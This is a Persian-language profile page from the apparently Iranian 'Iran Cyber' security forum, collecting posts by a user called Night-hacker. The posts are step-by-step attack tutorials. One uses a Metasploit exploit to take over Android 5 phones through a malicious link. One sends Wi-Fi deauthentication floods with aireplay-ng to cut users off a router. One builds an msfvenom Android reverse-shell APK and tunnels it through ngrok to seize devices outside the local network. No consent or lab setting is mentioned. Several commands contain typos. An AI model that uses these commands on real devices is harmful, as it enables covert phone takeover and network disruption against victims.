رفتن به مطلب

با توجه به آماده سازی و تامین زیرساخت لازم جهت تبدیل انجمن به یک منبع آموزشی در حوزه امنیت و ارزیابی امنیت، لطفا فایل های خود را در انجمن پیوست نمایید. در غیر این صورت تاپیک شما حذف خواهد شد.

 

Night-hacker

New Member
  • تعداد ارسال ها

    7
  • تاریخ عضویت

  • آخرین بازدید

  • روز های برد

    3

آخرین بار برد Night-hacker در خرداد 10

Night-hacker یکی از رکورد داران بیشترین تعداد پسند مطالب است !

اعتبار در سایت

8 Neutral

2 دنبال کننده

آخرین بازدید کنندگان نمایه

بلوک آخرین بازدید کننده ها غیر فعال شده است و به دیگر کاربران نشان داده نمی شود.

  1. سلام خدمت اساتید و دوستان گرامی، در این آموزش قصد داریم دستگاه اندرویدی را با فرستادن لینک آلوده هک کنیم. این روش برای دستگاه های اندرویدی(5 و 5.5) جواب میده. خب بریم سراغ دستورات: 1. دستور اول اکسپلویت خودمونو میسازیم: use exploit/android/browser/webview_addjavascriptinterface 2. با دستورات زیر آپشن های مورد نظر را ست میکنیم: show options set SRVHOST set SRVHOST xxx.xxx.x.x set URIPATH / set LHOST xxx.xxx.x.x set LPORT 8080 3. با دستور زیر اکسپلویت را ران میکنیم: run بعد از وارد کردن دستورات بالا،اکسپلویت ما با هاست و پورتی که مشخص کردیم،ست میشود. با این روش هم میتوان دستگاه های درون شبکه محلی را مورد نفوذ قرار داد هم دستگاه های خارج از شبکه محلی(روش هک دستگاه اندرویدی خارج از شبکه در تاپیک قبلی) * تارگت بعد از باز کردن لینک مخرب دسترسی را به ما میدهد. -- امیدوارم مفید واقع شده باشه 😊
  2. Night-hacker

    پسورد و یوزنیم هنگام کلون ابزار

    لینک قسمت بالایی رو کپی کنید.قسمتی که نوشته دانلود زیپ،لینک قرار داده شده.(نیازی به یوز،پس نیست)
  3. سلام خدمت استاید و دوستان گرامی، توی این پست قصد دارم نحوه قطع دسترسی اعضا به مودم رو توضیح بدم. ((حتما کارت شبکه روی حالت مانیتورینگ باشد)) در این نوع حمله نیازی به داشتن رمز مودم نیست. در این نوع حمله ما پکت هایی رو به سمت مودم ارسال میکنیم و باعث میشود کسانی که به مودم متصل شدند،ارتباط آنها قطع شود. برای شروع حمله دستورات زیر را به ترتیب وارد ترمینال لینوکس میکنیم: 1- ابتدا ترمینال لینوکس را باز میکنیم و با دستور زیر وارد روت میشویم: sudo su 2- بعد از وارد شدن به ترمینال روت کالی،با دستور زیر هر چه wifi در اطرافمون هست رو جسجتو میکنه: airodump-ng wlan0 3- بعد از جستجوی wifi های اطراف باید نام چنل،نام تارگت و در نهایت نام کارت شبکه خودمونو وارد کنیم(با این دستور تمام دستگاه های متصل به شبکه رو مشاهده میکنیم): airodump-ng -c 1 --write <nametarget> wlan0 بعد از وارد کردن دستورات بالا،ترمینال جدیدی باز میکنیم و دستورات زیر را به ترتیب وارد میکنیم: 1- با دستور زیر وارد ترمینال روت کالی میشویم: sudo su 2- با دستور زیر حمله رو روی تارگتمون انجام میدهیم(شناسایی تارگت،شماره 3 بالا): aireplay-ng deauth 1000 -a bssid -c station wlan0 با دستور بالا مشخص کردیم 1000 پکت به سمت bssid مشخص ارسال کند و باعث قطع دسترسی تارگت به wifi شود. امید وارم مفید واقع شده باشه.🙂
  4. خب بریم سراغ ادامه آموزش 👊 قبل از شروع ادامه آموزش،به چند سوالی که ممکنه براتون پیش بیاد جواب بدم: سوال اول : آیا میتونم بعد از قطع شدن سرویس بازم از همون پیلود استفاده کنم؟ در حالت عادی این امکان وجود نداره اما با تهیه نسخه vip این سرویس این امکان وجود داره. سوال دوم : آیا ممکنه بعد از وصل شدن Ngrok ممکن است اتصال به سرویس بدون دلیل قطع شود؟خیر،تا زمانی که شما این سرویس را قطع نکنید سرویس مربوطه قطع نخواهد شد. سوال سوم : آیا نیاز به پورت فورواردینگ داریم؟خیر،بالا تر هم توضیح دادم با استفاده از این سرویس دیگه نیازی به پورت فورواردینگ و این داستانا ندارید. و سوال آخر اینکه این سرویس قابل اعتماد است؟ بله، ترافیک اینترنت به صورت کاملا اختصاصی فوروارد میشود و هویت شما مخفی می ماند. 💢 ادامه آموزش هک اندروید خارج از شبکه محلی: راه اندازی سیستم Ngrok: ابتدا شما وارد پوشه ای میشید که ngrok در آنجا نصب است،سپس ترمینال لینوکس را در پوشه مربوطه باز میکنید و دستور زیر را تایپ میکنید: ngrok tcp 4444/. با نوشتن این دستور،سرویس ngrok در پورت 4444 برای شما باز میشود. حالا نوبت ساخت پیلود اندرویدی میرسه. دوباره ترمینال لینوکس را باز کرده و دستور زیر را تایپ کنید: msfvenom -p android/meterpreter/reverse_tcp LHOST=Forwarding LPORT=Forwarding R > Desktop/rat.apk در کد بالا شما باید قسمت lhost آدرس هاستی که در قسمت forwarding نوشته شده است را وارد کنید،در قسمت lport همچنین باید پورتی که در قسمت forwarding نوشته شده است را وارد کنید. بعد از وارد کردن دستور بالا،پیلود اندرویدی برای شما در آدرس مورد نظر ساخته میشود. حالا زمان ست کردن lhost و lport میرسه(این قسمت خیلی مهمه!!) در قسمت ست کردن lhost و lport باید دستورات زیر را وارد کنید تا پیلود دقیق ست شود: set LHOET webinterface set LPORT localhost در قسمت اول (set lhost)،lhost مورد نظر قسمت interface نوشته شده که شما باید بدون وارد کردن http آن را وارد و ست کنید. در قسمت دوم(lport)،lport مورد نظر قسمت localhost نوشته شده است که همان پورتی است که در بالاتر وارد کردیم(4444) بعد از ست کردن،با دستور expliot پیلود ما ران میشود و آماده فرستادن به تارگت...! با این سرویس تونستیم تارگت اندرویدی را خارج از شبکه محلی هک کنیم...!
  5. خیر، لازم نیست نه شما نه تارگت به فیلتر شکن متصل باشید.
  6. سلام خدمت دوستان عزیز، خیلی از دوستان براشون سوال پیش اومده که دسترسی گرفتن از دستگاه اندروید(تارگت)خارج از شبکه ممکن است یا نه؟ در جواب این سوال باید بگم میشه از دستگاه اندرویدی خارج از شبکه محلی خودمون دسترسی کامل بگیریم. برای این کار تنها نیاز به نصب سرویس ngrok بسته به سیستم عامل خودتون دارید. با نصب این سیستم دیگه نیازی به پورت فورواردینگ و این داستانا ندارید. برای نصب این سرویس،باید به سایت ngrok.com مراجعه کنید و طبق نوع سیستم عامل خودتون دانلود کنید. بعد از ثبت نام در این سایت به شما یک کلید فعال سازی میده که میتونید با اون کلید ngrok رو فعال کنید. اگه حمایت کنید از این پست حتما نحوه کار و راه اندازی کامل این سیستم رو بهتون میگم.😁

تاریخچه انجمن امنیتی ایران سایبر

شرکت امنیتی ایران سایبر با بکار گیری افراد متخصص در حوزه امنیت و ارائه راه کار در زمینه امنیت شبکه و امنیت بانک های اطلاعاتی در سال ۲۰۰۹ کار خود را آغاز نمود.

این شرکت با تعریفی جدید از ارائه خدمات و مشاوره در حوزه امنیت سازمان ها و مراکز، تست نفوذ، و برنامه نویسی در تعاملی سازنده با سازمان ها، مشتری مداری را سرلوحه کار خود قرار داده و آماده همکاری با شرکت ها و ارگان های مختلف می باشد.

رعایت قوانین

شرکت و انجمن امنیتی ایران سایبر با توجه به حضور مجاز و رسمی در محافل امنیتی و شرکت های ارزیابی امنیت ملزم به رعایت قوانین بوده و کاربران انجمن نیز ملزم به رعایت قوانین جمهوری اسلامی ایران میباشد.

×
×
  • اضافه کردن...